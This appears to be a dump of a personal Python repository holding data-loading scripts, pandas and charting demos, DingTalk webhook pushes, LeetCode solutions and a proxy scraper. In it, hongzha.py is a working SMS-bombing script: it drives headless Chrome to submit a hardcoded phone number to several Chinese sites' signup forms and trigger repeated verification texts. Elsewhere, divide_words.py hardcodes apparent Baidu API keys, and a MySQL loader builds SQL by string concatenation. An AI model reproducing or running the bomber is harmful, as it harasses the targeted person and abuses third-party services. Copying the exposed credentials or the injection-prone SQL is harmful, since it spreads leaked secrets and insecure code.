encoding="utf-8_sig") as f: 120 | csv_reader = csv.reader(f) 121 | headers = next(csv_reader) 122 | headers[0] = "id" # 当列名为空时替换 123 | 124 | # 0. 遍历csv文件中的数据 125 | # for rows in csv_reader: 126 | # print(rows) 127 | 128 | # 1. 新建表 129 | createTable_sql = """ 130 | CREATE TABLE IF NOT EXISTS`test2` ( 131 | `%s` INT PRIMARY KEY AUTO_INCREMENT NOT NULL, 132 | `%s` varchar(128) DEFAULT NULL, 133 | `%s` varchar(128) DEFAULT NULL, 134 | `%s` varchar(128) DEFAULT NULL, 135 | `%s` varchar(30) DEFAULT NULL, 136 | `%s` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, 137 | `%s` varchar(500) DEFAULT NULL, 138 | `%s` text(65533) DEFAULT NULL, 139 | `%s` varchar(30) DEFAULT NULL, 140 | `%s` varchar(30) DEFAULT NULL, 141 | `%s` varchar(50) DEFAULT NULL 142 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 143 | """ % (headers[0], headers[1], headers[2], headers[3], headers[4], headers[5], headers[6], headers[7], headers[8], headers[9], headers[10]) 144 | # cursor.execute(createTable_sql) 145 | 146 | # 2. 
插入数据--注意数据清洗 147 | for i,rows in enumerate(csv_reader): # enumerate为python内置函数,用于既要遍历索引又要遍历元素 148 | 149 | # 涉及数据清洗,对存入数据库的数据清洁度的要求较高,双引号影响数据插入 150 | name = rows[3] 151 | comment = rows[7] 152 | 153 | # 数据清洗 154 | name = name.replace("\'", "") 155 | comment = comment.replace("\"", "").replace(".,", ".").replace(",,", ",").replace("..,", "..").replace(":,", ":") 156 | 157 | insert_sql = """INSERT INTO test2 VALUES ( %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s )""" % (rows[0], "'" + rows[1] + "'", "'" + rows[2] + "'", "'" + name + "'", "'" + rows[4] + "'", "'" + rows[5] + "'", "'" + rows[6] + "'", "'" + comment + "'", "'" + rows[8] + "'", "'" + rows[9] + "'", "'" + rows[10] + "'") 158 | # cursor.execute(insert_sql) # 插入数据 159 | 160 | conn.commit() # 提交 161 | cursor.close() 162 | conn.close() 163 | except: 164 | conn.rollback() # 发生错误则全部回滚 165 | traceback.print_exception 166 | 167 | def csv2oracle(self): 168 | print("connect to oracle...") 169 | try: 170 | # 1. 链接Oracle数据库 171 | conn = self.oracle_localhost 172 | cursor = conn.cursor() 173 | 174 | # 2. 查询数据 175 | sql = "select * from EMP" 176 | cursor.execute(sql) 177 | allData = cursor.fetchall() # cursor.fetchone() 178 | for data in allData: 179 | print(data) 180 | 181 | # # 3. 
插入、更新、删除 主要区别在于sql不同 182 | # def sqlDML(sql, conn): 183 | # cursor = conn.cursor() 184 | # cursor.execute(sql) 185 | # cursor.close() 186 | # conn.commit() 187 | 188 | conn.commit() 189 | cursor.close() 190 | conn.close() 191 | except: 192 | conn.rollback() 193 | traceback.print_exception 194 | 195 | trans = trans() 196 | # trans.json2mongodb() 197 | # trans.csv2mysql() 198 | # trans.csv2oracle() 199 | -------------------------------------------------------------------------------- /data_process/divide_words.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : HanLP, baiduNLP, jieba分词对比 6 | -------------------------------------- 7 | @File : divide_words.py 8 | @Time : 2018/8/25 22:10 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | # import hanlp 17 | from aip import AipNlp 18 | from jieba import * 19 | 20 | class baidu_nlp: 21 | def __init__(self): 22 | self.APP_ID = "020e0df2b55441d9b90861ea2b457ddf" 23 | self.API_KEY = "51fa55f6feb94a0fb7d4de49f111d6c2" 24 | self.SECRET_KEY = "129ba31afdaa439da5cf9ab0cd07d8f4" 25 | self.client = AipNlp(self.APP_ID, self.API_KEY, self.SECRET_KEY) 26 | 27 | def cifa(self, text): 28 | cifa = self.client.lexer(text) 29 | print(cifa) 30 | 31 | class jieba: 32 | pass 33 | 34 | 35 | if __name__ == '__main__': 36 | text = "你好,欢迎在Python中使用百度NLP" 37 | baidu_nlp = baidu_nlp() 38 | baidu_nlp.cifa(text) 39 | 40 | # print(HanLP.segment("你好,欢迎在Python中调用HanLP的API")) 41 | # 42 | # testCase = [ 43 | # "商品和服务", 44 | # "结婚的和尚未结婚的确实在干扰分词啊", 45 | # "买水果然后来世博园最后去世博会", 46 | # "中国的首都是北京", 47 | # "欢迎新老师生前来就餐", 48 | # "工信处女干事每月经过下属科室都要亲口交代24口交换机等技术性器件的安装工作", 49 | # "随着页游兴起到现在的页游繁盛,依赖于存档进行逻辑判断的设计减少了,但这块也不能完全忽略掉。"] 50 | # for sentence in testCase: 51 | # 
print(HanLP.segment(sentence)) 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /data_process/pandas_operation.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/8/27 20:20 8 | @File : pandas_operation.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import pandas as pd 16 | import numpy as np 17 | from copy import deepcopy 18 | 19 | ## 1. read_cvs 20 | # 当读取的数据量很大时,请尝试添加这个参数:nrows 21 | pd.read_csv(nrows=5) 22 | # dtype 声明列的类型 23 | df = pd.DataFrame(dtype={'col1': str, 'c2': int}) 24 | 25 | 26 | ## 2. select_dtypes 在读取表之后,每个列的默认数据类型可以是bool、int64、float64、object、category、timedelta64或datetime64。 27 | df.select_dtypes(include=['float64', 'int64']) 28 | 29 | 30 | ## 3. copy 复制 df 31 | df1 = pd.DataFrame({'a': [0, 0, 0], 'b': [1, 1, 1]}) 32 | df2 = df1 33 | df2['a'] = df2['a'] + 1 34 | df1.head() 35 | 36 | # df2 = df1不是复制df1并将其赋值给df2,而是设置一个指向df1的指针。所以df2的任何变化都会导致df1的变化 37 | df2 = df1.copy() 38 | # 或者 39 | df3 = deepcopy(df1) 40 | 41 | 42 | ## 4. map 43 | # 数据转换。keys 是旧值,values 是新值 44 | level_map = {1: 'high', 2: 'medium', 3: 'low'} 45 | df['c_level'] = df['c'].map(level_map) 46 | 47 | 48 | ## 5. apply 49 | # 创建一个新列,其中包含其他列内容作为输入 50 | # 缺点:速度慢 51 | def rule(x, y): 52 | if x == 'high' and y > 10: 53 | return 1 54 | else: 55 | return 0 56 | 57 | df = pd.DataFrame({'c1': ['high', 'high', 'low', 'low'], 'c2': [0, 23, 17, 4]}) 58 | df['new'] = df.apply(lambda x: rule(x['c1'], x['c2']), axis=1) 59 | df.show() 60 | 61 | 62 | ## 6. 
value_counts 查看值分布 63 | df['col1'].value_counts() 64 | # normalize = True:如果你想查看频率而不是计数。 65 | # dropna = False:如果你还想在统计中包含缺失值。 66 | # sort = False:按值而不是按计数排序的统计结果。 67 | # df['c'].value_counts().reset_index():如果你想将stats表转换为pandas dataframe并对其进行操作。 68 | 69 | 70 | ## 7. 缺失值数量 71 | # .isnull() 和 .sum() 来计算指定列中缺失值的数量。 72 | df = pd.DataFrame({'id': [1, 2, 3], 'c1': [0, 0, np.nan], 'c2': [np.nan, 1, 1]}) 73 | df = df[['id', 'c1', 'c2']] 74 | df['num_nulls'] = df[['c1', 'c2']].isnull().sum(axis=1) 75 | df.head() 76 | 77 | 78 | ## 8. 选择特定多个 ID 的行 79 | df_filter = df['ID'].isin(['A001', 'C022']) 80 | print(df[df_filter]) 81 | 82 | 83 | ## 9. 百分位组 将一列的值分类为几组。 84 | # 比如前5%的值分为组1,5-20%的值分为组2,20-50%的值分为组3,底部50%的值分为组4 85 | cut_points = [np.percentile(df['col'], i) for i in [50, 80, 95]] 86 | df['group'] = 1 87 | for i in range(3): 88 | df['group'] = df['group'] + (df['col'] < cut_points[i]) 89 | 90 | 91 | ## 10. to_csv 92 | # 准确地打印出写入文件的前五行 93 | print(df[:5].to_csv()) 94 | 95 | # 处理混合在一起的整数和缺失值。 96 | # 如果一个列同时包含缺失值和整数,那么数据类型仍然是float而不是int。 97 | # 导出表时,可以添加 float_format='%.0f' ,将所有浮点数化为整数。 98 | # 如果你只想要所有列的整数输出,请使用此技巧。 99 | -------------------------------------------------------------------------------- /data_process/word_cloud.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/python3 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @File : word_cloud.py 6 | @Time : 2018/8/26 0:37 7 | @Software : PyCharm 8 | -------------------------------------- 9 | @Description : 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | # WordCloud + 统计图表 17 | ''' 18 | 关键点和难点在于: 19 | 对于网上用户的评论+文字做分析,提取出关键点作为列表 20 | ''' 21 | 22 | import os 23 | from pyecharts import WordCloud 24 | from pyecharts import Bar, Pie, Line, Scatter3D 25 | from pyecharts import Page 26 | import random 27 | 28 | 29 | # 词云图 30 | def 
wordCloud(x, y, label): 31 | wordCloud = WordCloud(width=1300, height=620) 32 | 33 | # word_size_ragne限定字体大小范围 34 | # shape参数用来调整词云形状('circle', 'cardioid', 'diamond', 'triangle-forward', 'triangle', 'pentagon', 'star') 35 | wordCloud.add("", x, y, word_size_range=[20, 100], shape="circle") 36 | wordCloud.render() 37 | os.system(r"render.html") # 默认内容输出到根目录 38 | 39 | 40 | # 统计图表 41 | def get_charts(x, y, label, type): 42 | if type == 1: 43 | c = Pie("饼状图") 44 | elif type == 2: 45 | c = Bar3D("条形图") 46 | elif type == 3: 47 | c = Line("折线图") 48 | print(c) 49 | c.add(label, x, y, is_more_utils=True) 50 | # 打印输出图表的所有配置项 51 | c.show_config() 52 | c.render() 53 | os.system(r"render.html") 54 | 55 | 56 | # 多个统计图 57 | def get_otherCharts(page): 58 | attr = ["衬衫", "羊毛衫", "雪纺衫", "裤子", "高跟鞋", "袜子"] 59 | v1 = [5, 20, 36, 10, 75, 90] 60 | v2 = [10, 25, 8, 60, 20, 80] 61 | bar = Bar("柱状图数据堆叠示例") 62 | bar.add("商家A", attr, v1, is_stack=True) 63 | bar.add("商家B", attr, v2, is_stack=True) 64 | page.add(bar) 65 | page.render() 66 | os.system(r"render.html") 67 | 68 | 69 | # Scatter3D 70 | def get_scatter3D(page): 71 | data = [[random.randint(0, 100), random.randint(0, 100), random.randint(0, 100)] for _ in range(80)] 72 | range_color = ['#313695', '#4575b4', '#74add1', '#abd9e9', '#e0f3f8', '#ffffbf', 73 | '#fee090', '#fdae61', '#f46d43', '#d73027', '#a50026'] 74 | scatter3D = Scatter3D("3D散点示例", width=1200, height=600) 75 | scatter3D.add("", data, is_visualmap=True, visual_range_color=range_color) 76 | page.add(scatter3D) 77 | page.render() 78 | os.system(r"render.html") 79 | 80 | 81 | def main(): 82 | ''' 83 | # 测试词云图 84 | x = [ 85 | "python", "lxj", "zj", "big data", "python", "lxj", "zj", "big data", 86 | "python", "lxj", "zj", "big data", "python", "lxj", "zj", "big data" 87 | ] 88 | y = [ 89 | 10000, 8000, 6000, 3000, 10000, 8000, 6000, 3000, 90 | 10000, 8000, 6000, 3000, 10000, 8000, 6000, 3000 91 | ] 92 | label = "词云" 93 | wordCloud(x, y, label) 94 | ''' 95 | 96 | ''' 97 | # 
测试统计图表 98 | x = ["衬衫", "袜子", "高跟鞋", "羊毛衫", "裤子"] 99 | y1 = [5, 10, 38, 75, 90] 100 | y2 = [15, 4, 70, 25, 190] 101 | label = "服装" 102 | type = 2 103 | get_charts(x, y, label, type) 104 | ''' 105 | 106 | ''' 107 | # 测试多个统计图 108 | page = Page() 109 | get_otherCharts(page) 110 | ''' 111 | 112 | # 测试三维散点图 113 | page = Page() 114 | get_scatter3D(page) 115 | 116 | 117 | if __name__ == "__main__": 118 | main() 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /interesting/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2020/2/9 19:01 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /interesting/apscheduler/a.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/interesting/apscheduler/a.ico -------------------------------------------------------------------------------- /interesting/apscheduler/testApscheduler.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 测试 apscheduler 6 | 使用: 7 | 1.安装pyinstaller包、pywin32包; 8 | 2.同目录下,存放xx.ico图标文件; 9 | 3.pycharm的terminal中执行打包指令: 10 | >pyinstaller -F -w -i a.ico testApscheduler.py 11 | 4.生成对应的testApscheduler.exe文件 12 | 13 | 参考链接: 14 | https://www.jianshu.com/p/4f5305e220f0 15 | https://zhuanlan.zhihu.com/p/46948464 16 | -------------------------------- 17 | @Time : 2019/5/21 10:50 18 | @File : 
testApscheduler.py 19 | @Software: PyCharm 20 | -------------------------------- 21 | @Author : lixj 22 | @contact : lixj_zj@163.com 23 | """ 24 | 25 | from multiprocessing import freeze_support 26 | from apscheduler.schedulers.blocking import BlockingScheduler 27 | from apscheduler.triggers.cron import CronTrigger 28 | 29 | 30 | def tick(): 31 | with open("aa.txt", "w", encoding="utf-8") as f: 32 | f.write("123456") 33 | print("write done") 34 | 35 | 36 | if __name__ == '__main__': 37 | freeze_support() # 防止多进程 38 | scheduler = BlockingScheduler() 39 | # 通过CronTrigger设置时间,防止pyinstall打包执行exe报错:No trigger by the name "cron" was found 40 | trigger = CronTrigger(hour='15', minute='55') 41 | scheduler.add_job(tick, trigger=trigger) 42 | 43 | try: 44 | scheduler.start() 45 | except (KeyboardInterrupt, SystemExit): 46 | pass 47 | -------------------------------------------------------------------------------- /interesting/dingding_push/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2020/2/9 18:34 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /interesting/dingding_push/demo.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 测试 python 推送钉钉消息 6 | -------------------------------- 7 | @Time : 2020/2/9 19:13 8 | @File : demo.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | import json 17 | import logging 18 | import pymysql 19 | 20 | 
# Logging setup: write DEBUG-and-above records to a log file.
logging.basicConfig(
    level=logging.DEBUG,  # minimum level that gets recorded
    filename='/app/mom/demo/run_log.log',  # explicit path; default would land in /root
    filemode='a',  # 'a' = append (the default); 'w' would truncate on every run
    format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'
)


def conn_read_data():
    """Connect to MySQL and return the row count of the target table.

    Returns:
        The COUNT(id) value as an int, or None when the query fails.
    """
    conn_info = pymysql.connect(
        host='XXXX',
        port=3306,
        user='XXXX',
        passwd='XXXX',
        db='XXXX',
        charset='utf8'  # pymysql wants 'utf8', not 'utf-8'
    )
    try:
        cursor = conn_info.cursor()
        findall_sql = "select count(id) from XXXX"
        cursor.execute(findall_sql)
        # BUG FIX: cursor.execute() returns the number of result rows
        # (always 1 for a COUNT query), not the count itself.  Fetch the
        # scalar from the single result row instead.
        count = cursor.fetchone()[0]
        cursor.close()
        return count
    except Exception:
        conn_info.rollback()  # best-effort rollback on any error, as before
    finally:
        # BUG FIX: the original only closed the connection on the success
        # path; always release it.
        conn_info.close()


def ding_push_message(msg):
    """POST *msg* as a DingTalk text message to the webhook.

    NOTE(review): relies on the module-level globals ``web_url`` and
    ``header`` being assigned first (done in the __main__ block below) —
    confirm before reusing this function from another module.
    """
    # DingTalk "text" message payload; isAtAll pings everyone in the group.
    message = {
        "msgtype": "text",
        "text": {
            "content": msg
        },
        "at": {
            "isAtAll": True
        }
    }

    message_json = json.dumps(message)  # the webhook expects a JSON body
    info = requests.post(url=web_url, data=message_json, headers=header)
    logging.info(info.text)  # log the webhook's response for troubleshooting


if __name__ == "__main__":
    # DingTalk webhook URL (access token redacted).
    web_url = "https://oapi.dingtalk.com/robot/send?access_token=XXXX"

    # Request headers for the webhook call.
    header = {
        "Content-Type": "application/json",
        "Charset": "UTF-8"
    }

    # Build the message text from the live row count.
    msg = "【钉钉消息】目前人数共" + str(conn_read_data()) + "人。"

    ding_push_message(msg)
content。 9 | -------------------------------- 10 | @Time : 2020/2/9 18:34 11 | @File : dingding_push_msg.py 12 | @Software: PyCharm 13 | -------------------------------- 14 | @Author : lixj 15 | @contact : lixj_zj@163.com 16 | """ 17 | 18 | import requests 19 | import json 20 | 21 | 22 | def ding_push_message(): 23 | # 构建请求头部 24 | header = { 25 | "Content-Type": "application/json", 26 | "Charset": "UTF-8" 27 | } 28 | 29 | # 构建请求数据 30 | message = { 31 | "msgtype": "text", 32 | "text": { 33 | "content": msg 34 | }, 35 | "at": { 36 | "isAtAll": True 37 | } 38 | } 39 | 40 | # 对请求的数据进行json封装 41 | message_json = json.dumps(message) 42 | # 发送请求 43 | info = requests.post(url=web_url, data=message_json, headers=header) 44 | # 打印返回的结果 45 | print(info.text) 46 | 47 | 48 | if __name__ == "__main__": 49 | # 请求的URL,WebHook地址 50 | web_url = "https://oapi.dingtalk.com/robot/send?access_token=xxxx" 51 | # 构建请求数据 52 | msg = "钉钉,测试消息。。。" 53 | 54 | ding_push_message() 55 | -------------------------------------------------------------------------------- /interesting/hongzha.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 短信轰炸 6 | 1. chromedriver.exe 放入到指定的文件路径下 7 | 2. 
版本对应 8 | -------------------------------------- 9 | @File : financialCalculator.py 10 | @Time : 2018/8/25 12:28 11 | @Software : PyCharm 12 | -------------------------------------- 13 | @Author : lixj 14 | @Contact : lixj_zj@163.com 15 | -------------------------------------- 16 | """ 17 | 18 | import time 19 | from selenium import webdriver 20 | from threading import Thread 21 | 22 | class hongZha(): 23 | def __init__(self): 24 | self.target_phone = "13636466080" # phone 25 | self.num = 0 # number 26 | self.chrome_options = webdriver.ChromeOptions() 27 | self.chrome_options.add_argument('--headless') 28 | self.chrome_options.add_argument('--disable-gpu') 29 | self.chrome_options.add_argument('--user-agent=Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') 30 | self.driver = webdriver.Chrome(chrome_options=self.chrome_options, executable_path='../otherfiles/chromedriver/chromedriver.exe') 31 | 32 | def send_result(self, button, name): 33 | button.click() 34 | self.num += 1 35 | print("{} 第{}次发送成功 {}".format(self.target_phone, self.num, name)) 36 | time.sleep(2) 37 | 38 | # 1. 39 | def zhihu(self, name): 40 | self.driver.get("https://www.zhihu.com/signup") 41 | self.driver.find_element_by_xpath("//button[@class='Button Button--primary Button--blue']").click() 42 | time.sleep(3) 43 | tel = self.driver.find_element_by_xpath("//input[@placeholder='手机号']") 44 | tel.send_keys(self.target_phone) 45 | button = self.driver.find_element_by_xpath("//button[@class='Button CountingDownButton SignFlow-smsInputButton Button--plain']") 46 | self.send_result(button, name) 47 | self.driver.quit() 48 | 49 | # 2. 
50 | def weipinhui(self, name): 51 | self.driver.get("https://passport.vip.com/register") 52 | tel = self.driver.find_element_by_xpath("//input[@placeholder='请输入手机号码']") 53 | tel.send_keys(self.target_phone) 54 | button = self.driver.find_element_by_xpath("//a[@id='J_mobile_verifycode_btn']") 55 | self.send_result(button, name) 56 | self.driver.quit() 57 | 58 | # 3. 59 | def suning(self, name): 60 | self.driver.get("https://reg.suning.com/person.do") 61 | tel = self.driver.find_element_by_xpath("//input[@id='mobileAlias']") 62 | tel.send_keys(self.target_phone) 63 | button = self.driver.find_element_by_xpath("//a[@id='sendSmsCode']") 64 | self.send_result(button, name) 65 | self.driver.quit() 66 | 67 | # 3. 68 | def mail163(self, name): 69 | self.driver.get("http://reg.email.163.com/unireg/call.do?cmd=register.entrance&from=163mail_right") 70 | tel = self.driver.find_element_by_xpath("//input[@id='mobileIpt']") 71 | tel.send_keys(self.target_phone) 72 | button = self.driver.find_element_by_xpath("//a[@id='sendAcodeStg']") 73 | self.send_result(button, name) 74 | self.driver.quit() 75 | 76 | if __name__ == '__main__': 77 | hongZha = hongZha() 78 | 79 | zh = Thread(target=hongZha.zhihu, args=("zhihu", )) 80 | zh.start() 81 | 82 | # wph = Thread(target=hongZha.weipinhui, args=("weipinhui", )) 83 | # wph.start() 84 | 85 | # sn = Thread(target=hongZha.suning, args=("suning", )) 86 | # sn.start() 87 | 88 | # mail163 = Thread(target=hongZha.mail163, args=("mail163", )) 89 | # mail163.start() 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /other_files/chromedriver/chromedriver.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/other_files/chromedriver/chromedriver.exe -------------------------------------------------------------------------------- 
/practice/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/5/25 10:32 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /practice/leetcode/237.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 请编写一个函数,使其可以删除某个链表中给定的(非末尾)节点,你将只被给定要求被删除的节点。 7 | 现有一个链表 -- head = [4,5,1,9],它可以表示为: 8 | 4->5->1->9 9 | 10 | 示例 1: 11 | 输入: head = [4,5,1,9], node = 5 12 | 输出: [4,1,9] 13 | 解释: 给定你链表中值为 5 的第二个节点,那么在调用了你的函数之后,该链表应变为 4 -> 1 -> 9. 14 | 15 | 示例 2: 16 | 输入: head = [4,5,1,9], node = 1 17 | 输出: [4,5,9] 18 | 解释: 给定你链表中值为 1 的第三个节点,那么在调用了你的函数之后,该链表应变为 4 -> 5 -> 9. 
# ---- practice/leetcode/237.py ----------------------------------------------
# LeetCode 237: delete a given (non-tail) node from a singly linked list when
# only that node -- not the head -- is handed to you.  Trick: copy the
# successor's value into the node, then splice the successor out.


class ListNode:
    """Minimal singly linked list node."""

    def __init__(self, x):
        self.val = x
        self.next = None


class Solution:
    def deleteNode(self, node):
        """Remove *node* from its list in O(1) without access to the head.

        The problem guarantees *node* is a valid non-tail node, so
        ``node.next`` always exists.

        BUG FIX: the original implementation fell through after relinking
        and unconditionally executed ``node.val = node.next.val`` /
        ``node.next = None``, truncating the list right after the deleted
        position.
        """
        node.val = node.next.val  # overwrite with the successor's value
        node.next = node.next.next  # splice the successor out


if __name__ == "__main__":
    # Demo: delete the node holding 5 from 4 -> 5 -> 1 -> 9 (expect 4, 1, 9).
    # (The original demo built a single detached node, which can never meet
    # the "non-tail node" precondition and raised AttributeError.)
    head = ListNode(4)
    head.next = ListNode(5)
    head.next.next = ListNode(1)
    head.next.next.next = ListNode(9)
    Solution().deleteNode(head.next)


# ---- practice/leetcode/709.py ----------------------------------------------
# LeetCode 709: convert a string to lower case.


class SolutionOne:
    def toLowerCase(self, str: str) -> str:
        """Lower-case via the built-in str.lower().

        NOTE: the parameter name `str` shadows the builtin; kept for
        signature compatibility with the LeetCode template.
        """
        return str.lower()


class SolutionTwo:
    def toLowerCase(self, str: str) -> str:
        """Lower-case manually: shift A-Z by 32 code points (the ASCII
        distance between upper and lower case); leave everything else."""
        result = []
        for char in str:
            if 'A' <= char <= 'Z':
                result.append(chr(ord(char) + 32))
            else:
                result.append(char)
        return "".join(result)


string = "Hello WORD"
# print(SolutionOne().toLowerCase(string))
print(SolutionTwo().toLowerCase(string))


# ---- practice/leetcode/771.py ----------------------------------------------
# LeetCode 771: count how many stones in S are jewels (characters of J).
# NOTE: these class names shadow the 709 SolutionOne/SolutionTwo above when
# this dump is read as one module; in the repo they live in separate files.


class SolutionOne:
    """O(len(J) * len(S)): compare every jewel against every stone."""

    def numJewelsInStones(self, J: str, S: str) -> int:
        num = 0
        for j in J:
            for s in S:
                if j == s:
                    num = num + 1
        return num


class SolutionTwo:
    """Single pass over S with `in J` membership tests."""

    def numJewelsInStones(self, J: str, S: str) -> int:
        num = 0
        for s in S:
            if s in J:
                num += 1
        return num


class SolutionThree:
    """O(len(J) + len(S)): hash-set membership."""

    def numJewelsInStones(self, J: str, S: str) -> int:
        jSet = set(J)
        return sum(s in jSet for s in S)


J = "aA"
S = "aAAbbbb"
print(SolutionTwo().numJewelsInStones(J, S))
# LeetCode 832: flip each row of a binary matrix horizontally (reverse it),
# then invert every bit (0 <-> 1).  Three equivalent implementations.


class Solution:
    def flipAndInvertImageOne(self, A):
        """Build a new matrix: reverse a copy of each row, then invert each
        bit via enumerate().  Does NOT mutate the input (each row is copied
        by the [::-1] slice)."""
        result = []
        for row in A:  # renamed from `list`, which shadowed the builtin
            row = row[::-1]  # reversed slice copy
            for key, value in enumerate(row):
                row[key] = 1 - value  # 1 - v flips 0<->1 (replaces if/else)
            result.append(row)
        return result

    def flipAndInvertImageTwo(self, A):
        """One-liner: reverse each row and XOR every bit with 1
        (x ^ 1 flips 0<->1 for binary values)."""
        return [[j ^ 1 for j in i[::-1]] for i in A]

    def flipAndInvertImageThree(self, A):
        """In-place two-pointer version: walk each row from both ends,
        inverting and swapping the end pair in one tuple assignment.
        Mutates A and returns it."""
        for i in A:
            start = 0
            end = len(i) - 1
            while start <= end:
                # invert both ends and swap them in a single step; when
                # start == end the middle element is simply inverted
                i[end], i[start] = 1 - i[start], 1 - i[end]
                start = start + 1
                end = end - 1
        return A


A = [[1, 1, 0], [1, 0, 1], [0, 0, 0]]
# print(Solution().flipAndInvertImageOne(A))
# print(Solution().flipAndInvertImageTwo(A))
print(Solution().flipAndInvertImageThree(A))
# ---- practice/leetcode/977.py ----------------------------------------------
# LeetCode 977: given integers sorted in non-decreasing order, return their
# squares, also in non-decreasing order.


class Solution:
    def sortedSquaresOne(self, A):
        """sorted() over a generator of squares.

        Time O(N log N), space O(N).
        """
        return sorted(i ** 2 for i in A)

    def sortedSquaresTwo(self, A):
        """Two pointers moving outward from the sign boundary.

        Find the first non-negative index, then merge the (reversed)
        negative prefix with the non-negative suffix by squared value.
        Time O(N), space O(N).
        """
        length = len(A)
        right = 0  # scans the non-negative suffix left-to-right
        # locate the first index holding a non-negative value
        while right < length and A[right] < 0:
            right += 1
        left = right - 1  # scans the negative prefix right-to-left
        result = []

        # merge while both sides still have elements
        while left >= 0 and right < length:
            if A[left] ** 2 > A[right] ** 2:
                result.append(A[right] ** 2)
                right += 1
            else:
                result.append(A[left] ** 2)
                left -= 1
        # drain whichever side is left over
        while left >= 0:
            result.append(A[left] ** 2)
            left -= 1
        while right < length:
            result.append(A[right] ** 2)
            right += 1
        return result

    def sortedSquaresThree(self, A):
        """Two pointers moving inward from both ends, filling the output
        from its largest slot downward (the largest square is always at
        one of the two ends).  Time O(N), space O(N) for the output.
        """
        left = 0
        right = len(A) - 1
        nowIndex = len(A) - 1  # next output slot to fill, largest first
        result = [0] * len(A)  # pre-sized; slots are overwritten below
        while left <= right:
            if A[left] ** 2 < A[right] ** 2:
                result[nowIndex] = A[right] ** 2
                right -= 1
            else:
                result[nowIndex] = A[left] ** 2
                left += 1
            nowIndex -= 1
        return result


nums = [-4, -1, 0, 3, 10]  # renamed from `list`, which shadowed the builtin
# print(Solution().sortedSquaresOne(nums))
# print(Solution().sortedSquaresTwo(nums))
print(Solution().sortedSquaresThree(nums))
# ---- spider/config/random_ip.py --------------------------------------------
# Harvest usable proxy IPs from xicidaili, persist them to a pool file, and
# hand out random proxies from that pool.

import requests
from bs4 import BeautifulSoup as bs
import user_agent
import logging
import os
import random
import traceback
import time

# Module-wide logging format.
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')


class RandomIp():
    """Scrape candidate proxies, validate them, and serve random ones."""

    def __init__(self):
        self.XICI_URL = "https://www.xicidaili.com/nn/"
        self.TEST_URL = "https://www.baidu.com/"
        self.IP_POOL_FILE = "ip_pool.txt"
        self.MAX_PAGE_OF_XICI = 3614  # total page count on the site
        self.NUM_OF_PAGES = 300  # how many listing pages to sample per run
        # Randomized request headers (user_agent is a sibling project module).
        self.headers = user_agent.UserAgent().get_headers()

    def get_target_pages(self, page):
        """Return NUM_OF_PAGES distinct random page numbers in [1, page)."""
        return random.sample(range(1, page), self.NUM_OF_PAGES)

    def request_get(self, url):
        """GET *url* with the randomized headers (10 s timeout)."""
        return requests.get(url, headers=self.headers, timeout=10)

